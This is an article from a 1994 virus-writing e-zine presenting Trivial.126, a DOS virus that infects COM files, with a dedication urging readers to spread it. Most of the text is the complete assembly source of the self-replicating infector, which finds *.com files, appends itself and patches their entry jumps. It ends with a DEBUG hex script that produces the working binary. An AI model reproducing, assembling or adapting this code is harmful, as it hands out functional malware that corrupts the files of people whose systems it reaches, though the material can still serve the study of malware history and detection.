Insane Reality issue #6 - (c)opyright 1994 Immortal Riot File 010 ; ------------------------------------------------------------------------------ ; ; - Trivial.126 - ; Created by Immortal Riot's destructive development team ; (c) 1994 The Unforgiven/Immortal Riot ; ; ------------------------------------------------------------------------------ ; þ Highly detected COM-infector þ ; ------------------------------------------------------------------------------ Crippleware: I sure know this ain't nothing hot, it is detected by Tbscan and F-prot (probably AVP as well..), it re-infects files, and well easy said 'sucks'. I just wanted to see how small I could write a generic infector.. ofcos, by not searching nextfiles, and assuming it will find a file, the filesize could be reduzed with 6 more bytes (i.e. to 120 bytes..), but that would cripple this code more than i thought was 'fair', so now, is can breath, still is in a wealchair, or whatever.. Dedication: VIRUS OF PEACE WE DEDICATE THIS VIRUS AS A SYMBOL OF THE NUCLEAR ASPIRATION: LET ALL NUCLEAR ARMS AND WARS BE GONE. AND THE NATIONS LIVE IN TRUE PEACE! MAY IT SPREAD TO ALL CORNERS OF THE EARTH TO MEET THE COMPUTER OF EVERY MAN. FOR IN IT THROB AND PALPITATE THE HEARTS OF ITS PEACE-LOVING DONORS. SO MAY YOU,TOO,FRIENDS. STEP FORWARD, AND SPEAD THIS VIRUS FOR PEACE! DEDICATED NOVEMBER 1994 BY THE UNFORGIVEN/IMMORTAL RIOT .model tiny .code .radix 16 org 100h ; cs:100h => start of com file start: storbuf db 00,00,00,00 ; just for the first generation! ; this will not be written in the ; files, making the file increase ; equal to 126 bytes! v_start: call get_off ; ;) get_off: pop bp ; get delta-offset sub bp, offset get_off lea si,[bp+orgbuf] ; transer 3 first bytes (2 than 1) mov di,100h ; from position di:100h to orgbuf! movsw ; movsb ; mov ah,1ah lea dx,[bp+code_end] ; set dta int 21h ; to end of program mov ah,4eh ; search for files that lea dx,[bp+com_files] ; match with the extension find_next: ; 'COM' int 21h jnc infect ; found one! quit: mov bx,100h ; did not, return jmp bx ; to original program! infect: lea dx,[bp+code_end+1eh] ; 1eh = adress to filename to open mov ax,3d02h ; open file int 21h ; in read/write mode xchg ax,bx ; put filehandle in bx mov ah,3fh ; read the first three bytes mov cx,3 ; of the file to orgbuf lea dx,[bp+orgbuf] int 21h mov ax,4202h ; move file-pointer xor cx,cx ; to end of file cwd int 21h sub ax,3h ; substract the 3 last bytes mov word ptr [bp+first_bytes+1],ax ; and put em in our buffer mov ah,40h ; write virus mov cx,code_end-v_start ; # bytes lea dx,[bp+v_start] ; dx:100h int 21h ; mov ax,4200h ; move file-pointer to xor cx,cx ; top of file cwd int 21h mov ah,40h ; write our own jump mov cx,3 ; instruction to the lea dx,[bp+first_bytes] ; beginning int 21h close: mov ah,3eh ; close file int 21h mov ah,4fh ; search next file jmp short find_next ; and loop the procedure ; until all files are infected com_files: db "*.com",0 ; files to search for first_bytes: db 0e9h,00h,00h ; buffer to calculate a new entry orgbuf: db 0cdh,20h,90h ; buffer to save 3 first bytes code_end: end start ------------------------------------------------------------------------------- N triv-126.com E 100 00 00 00 00 E8 00 00 5D 81 ED 07 01 8D B6 7F 01 E 110 BF 00 01 A5 A4 B4 1A 8D 96 82 01 CD 21 B4 4E 8D E 120 96 76 01 CD 21 73 05 BB 00 01 FF E3 8D 96 A0 01 E 130 B8 02 3D CD 21 93 B4 3F B9 03 00 8D 96 7F 01 CD E 140 21 B8 02 42 33 C9 99 CD 21 2D 03 00 89 86 7D 01 E 150 B4 40 B9 7E 00 8D 96 04 01 CD 21 B8 00 42 33 C9 E 160 99 CD 21 B4 40 B9 03 00 8D 96 7C 01 CD 21 B4 3E E 170 CD 21 B4 4F EB AD 2A 2E 63 6F 6D 00 E9 00 00 CD E 180 20 90 RCX 82 W Q